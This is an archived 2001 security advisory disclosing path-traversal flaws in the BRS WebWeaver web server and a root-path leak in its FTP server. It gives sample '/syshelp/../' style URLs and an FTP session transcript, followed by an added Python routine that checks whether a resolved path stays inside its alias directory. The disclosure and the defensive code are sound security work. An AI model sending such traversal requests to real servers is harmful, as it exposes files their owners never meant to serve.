Vulnerabilities in BRS WebWeaver

From: joetestaat_private
Date: Sat Apr 28 2001 - 16:57:20 PDT


    
    Vulnerabilities in BRS WebWeaver
    
    
    
        Overview
    
    BRS WebWeaver v0.63 is a combined FTP and web server available from
    http://bsoutham.home.dhs.org.  Vulnerabilities exist in the web
    server which allow remote users to break out of the web root using
    relative paths (i.e. '..', '...').  In addition, the FTP server
    can be made to disclose the physical path of the FTP root.
    
    
    
        Details
    
    The following URLs demonstrate the problem with the web server:
    
            http://localhost/syshelp/../[any file outside the web root]
            http://localhost/sysimages/../[any file outside the web root]
            http://localhost/scripts/../[any file outside the web root]
    
    
    The following is an illustration of the problem with the FTP server:
    
    >ftp localhost
    Connected to xxxxxxxxxxxx.rh.rit.edu.
    220 BRS WebWeaver FTP Server ready.
    User (xxxxxxxxxxxx.rh.rit.edu:(none)): jdog
    331 Password required for jdog.
    Password:
    230 User jdog logged in.
    ftp> cd *
    250 CWD command successful. "/*/" is current directory.
    ftp> ls
    200 Port command successful.
    150 Opening data connection for directory list.
    c:\windows\desktop\*\*.* not found
    226 File sent ok
    ftp: 36 bytes received in 0.06Seconds 0.60Kbytes/sec.
    ftp>
    
    
    
        Solution
    
    The web server root traversal vulnerabilities can be prevented by removing
    all user-defined aliases (i.e. 'syshelp', 'sysimages') as well as the
    ISAPI/CGI alias (i.e. 'scripts').  There is no solution for the FTP root
    disclosure vulnerability.
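    The root cause in the web server is that a request beginning with an alias
    name is joined to the alias directory and then served without checking
    whether the '..' (or, on Windows 9x filesystems, '...') segments moved the
    result back out of that directory.  The following is an added example of
    how a server can perform that containment check; it is not WebWeaver code
    and the document root, the alias target directories and the sample request
    paths are constructed for illustration.  It uses the alias names from the
    advisory, and rejects any request whose resolved path leaves the directory
    the alias (or the web root) points at.

```python
import posixpath
from urllib.parse import unquote

# Constructed sample configuration (not the product's real layout): a document
# root plus the three alias names named in the advisory.  Alias targets live
# outside the document root, which is why an alias is a tempting starting
# point for a traversal.
WEB_ROOT = "/srv/webweaver/wwwroot"
ALIASES = {
    "syshelp": "/srv/webweaver/syshelp",
    "sysimages": "/srv/webweaver/sysimages",
    "scripts": "/srv/webweaver/scripts",
}


class TraversalError(ValueError):
    """Raised when a request path would resolve outside its permitted base."""


def _split_segments(url_path):
    """Percent-decode, unify '\\' and '/' separators, and split into segments."""
    decoded = unquote(url_path).replace("\\", "/")
    return [seg for seg in decoded.split("/") if seg]


def resolve_request_path(url_path, web_root=WEB_ROOT, aliases=ALIASES):
    """Map a request path to a filesystem path.

    The first segment selects the base directory (an alias target or the web
    root); the remaining segments are joined under that base and the result is
    checked lexically to still lie inside the base.  Anything that escapes is
    refused rather than served.
    """
    segments = _split_segments(url_path)

    # Windows 9x-era filesystems treated '...' (and longer runs of dots) like
    # '..'.  posixpath.normpath does not collapse those, so refuse them outright.
    for seg in segments:
        if len(seg) >= 3 and set(seg) == {"."}:
            raise TraversalError("dot-run segment %r rejected" % seg)

    if segments and segments[0] in aliases:
        base, rest = aliases[segments[0]], segments[1:]
    else:
        base, rest = web_root, segments

    base = posixpath.normpath(base)
    # normpath collapses '.' and '..' so the comparison below sees the real target.
    candidate = posixpath.normpath(posixpath.join(base, *rest))

    # Containment check: the candidate must be the base itself or live below it.
    # Comparing against base + '/' avoids the '/srv/webweaver/syshelp-old'
    # prefix trap that a bare startswith(base) would fall into.
    if candidate != base and not candidate.startswith(base + "/"):
        raise TraversalError("%s escapes %s" % (url_path, base))
    return candidate


def is_allowed(url_path):
    """Boolean wrapper so a server loop can log and refuse without try/except."""
    try:
        resolve_request_path(url_path)
        return True
    except TraversalError:
        return False


if __name__ == "__main__":
    # Constructed request paths in the shape the advisory describes.
    for path in ["/syshelp/index.htm",
                 "/syshelp/../wwwroot/index.htm",
                 "/sysimages/..%2F..%2Fsecret.txt",
                 "/scripts/.../boot.ini",
                 "/index.htm"]:
        print("%-40s %s" % (path, "allowed" if is_allowed(path) else "REJECTED"))
```

    The check is purely lexical so it behaves the same on any platform; a real
    server should additionally resolve symlinks (os.path.realpath) before the
    containment comparison, since a link inside an alias directory can point
    outside it just as '..' does.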
    
    
    
        Vendor Status
    
    Blaine R Southam was contacted via <bsouthamat_private> on
    Saturday, April 21, 2001.  No reply was received.
    
    
    
        - Joe Testa
    
    e-mail:   joetestaat_private
    web page: http://hogs.rit.edu/~joet
    AIM:      LordSpankatron
    
    
    



    This archive was generated by hypermail 2b30 : Sun Apr 29 2001 - 17:39:14 PDT